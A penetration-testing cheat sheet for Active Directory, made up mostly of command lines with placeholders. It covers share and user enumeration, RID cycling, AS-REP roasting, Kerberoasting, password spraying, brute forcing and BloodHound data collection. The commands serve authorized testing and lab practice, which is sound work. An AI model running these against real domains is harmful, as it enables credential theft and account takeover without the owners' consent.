Active Directory
AD Enumeration
Basic Recon
netexec smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>Shares
# null session
netexec smb <IP> -u '' -p '' --shares
# guest
netexec smb <IP> -u 'guest' -p '' --sharesUser Enumeration
kerbrute userenum -d <domain> [--dc <target>] users.txtnetexec smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>RID Cycling
netexec smb [-u 'guest' -p ''] --rid-brute <target>
lookupsid.py [-no-pass] [[domain/]guest:@]<target>AS-REP Roast
With a valid username list
GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/With valid credentials
GetNPUsers.py '<domain>/<user>:<password>' -request
netexec ldap <target> -u '<user>' -p '<password>' --asreproast asreproast.txtKerberoast
If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC. There are a few options:
ntpdate <target>
rdate -n <target>GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>
netexec ldap <target> -u '<user>' -p '<password>' --kerberoasting kerberoasting.txtPassword Spraying / Brute Forcing
Password spraying
netexec smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'Brute forcing
netexec smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'BloodHound
BloodHound Python
# legacy
bloodhound-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip
# community edition
bloodhound-ce-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zipNetexec
netexec ldap <target> -u '<user>' -p '<password>' --bloodhound -c AllSharpHound
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
# exe
.\SharpHound.exe -CollectionMethods All
# ps1
. .\SharpHound.ps1; Invoke-BloodHound -CollectionMethods All -OutputDirectory .Last updated